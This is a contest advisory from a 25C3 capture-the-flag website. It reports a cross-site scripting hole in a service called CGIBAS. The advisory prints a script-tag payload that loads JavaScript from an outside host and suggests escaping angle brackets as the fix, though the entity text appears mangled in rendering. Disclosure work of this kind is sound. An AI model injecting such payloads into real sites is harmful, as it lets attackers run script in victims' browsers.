HC's Capture the Flag website
CTF Contests
25C3-CTF
25C3-CTF final results
Advisory #62
From team WiiPhonies
New advisory by : c1de0x
Affected service(s): CGIBAS
Severity [lmh] : medium
===== Problem =====
CGIBAS site is vulnerable to XSS. Adding a caption like:
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Will result in a javascript popup on the the download or search page.
===== Impact =====
Medium
===== Fix =====
Replace chars < and > with their equivalent HTML tags (< and >)
Rating
[0] (1) no more XSS for cgibas, please (2) more elaborated fixes, plz